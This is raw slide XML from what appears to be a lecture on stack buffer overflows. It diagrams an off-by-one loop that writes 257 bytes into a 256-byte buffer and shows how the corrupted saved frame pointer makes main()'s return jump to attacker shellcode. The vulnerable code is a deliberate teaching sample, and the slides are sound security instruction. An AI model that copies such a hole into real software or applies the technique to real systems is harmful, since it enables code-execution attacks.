          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7404100" y="3333750"/>
            <a:ext cx="76200" cy="285750"/>
            <a:chOff x="1392" y="2880"/>
            <a:chExt cx="48" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1142795" name="Oval 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="2880"/>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42796" name="Oval 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="2976"/>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42797" name="Oval 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="3072"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1142798" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="21145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saved_eip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1142799" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="12001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argc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1142800" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="1485900"/>
            <a:ext cx="2057400" cy="6286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argv</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1142801" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="50292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esp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1142802" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="531495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ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1142803" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="56007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pc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1142804" name="AutoShape 20"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8610600" y="1200150"/>
            <a:ext cx="152400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 66667"/>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42805" name="AutoShape 21"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8610600" y="2114550"/>
            <a:ext cx="152400" cy="2171700"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 158333"/>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42806" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="24003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eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>saved_ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1142807" name="Text Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="8399861" y="15464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main()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1142808" name="Text Box 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="8399861" y="30323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func()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1142811" name="AutoShape 27"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1142803" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2819400" y="5429251"/>
            <a:ext cx="3657600" cy="314325"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1142812" name="AutoShape 28"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1142802" idx="1"/>
            <a:endCxn id="1142791" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="3114675"/>
            <a:ext cx="1588" cy="2343150"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -52100005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1142813" name="AutoShape 29"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1142801" idx="1"/>
            <a:endCxn id="1142800" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="1800225"/>
            <a:ext cx="1588" cy="3371850"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -14400000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1142814" name="Rectangle 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="42862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i="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>free </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1142815" name="Rectangle 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8001000" y="2400300"/>
            <a:ext cx="533400" cy="285750"/>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1142820" name="Text Box 36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="5257800"/>
            <a:ext cx="2209800" cy="584776"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>main: return 0 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>saved_eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() Epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="4102894"/>
            <a:ext cx="1912703" cy="338554"/>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dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228602" y="4388644"/>
            <a:ext cx="2378075"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dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Times" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="4731544"/>
            <a:ext cx="2362200"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a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Times" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text Box 32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="286882" y="2105300"/>
            <a:ext cx="3326552" cy="2086725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sm</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r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[256];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>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for(</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 0;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&lt;= 256;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buffer[</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[</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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1269377055"/>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4834" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>What Happens Next?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1144835" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() returns, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> points to &amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When main() returns, the return sequence has the following effects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> takes the value of %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - 4)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> increases %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>esp’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> value by 4 (&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Upon return (ret), the pc is set to the value at the address of the stack pointer (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The attacker’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28859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48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48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448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448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448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448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9653" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="1085850"/>
            <a:ext cx="2057400" cy="3200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1179654" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="26860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&amp;shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1179655" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="29718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shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1179656" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="37147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nop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1179657" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="40005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int i</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 10"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7404100" y="3333750"/>
            <a:ext cx="76200" cy="285750"/>
            <a:chOff x="1392" y="2880"/>
            <a:chExt cx="48" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1179659" name="Oval 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="2880"/>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79660" name="Oval 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="2976"/>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79661" name="Oval 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="3072"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1179662" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="21145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saved_eip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1179663" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="12001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argc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1179664" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="1485900"/>
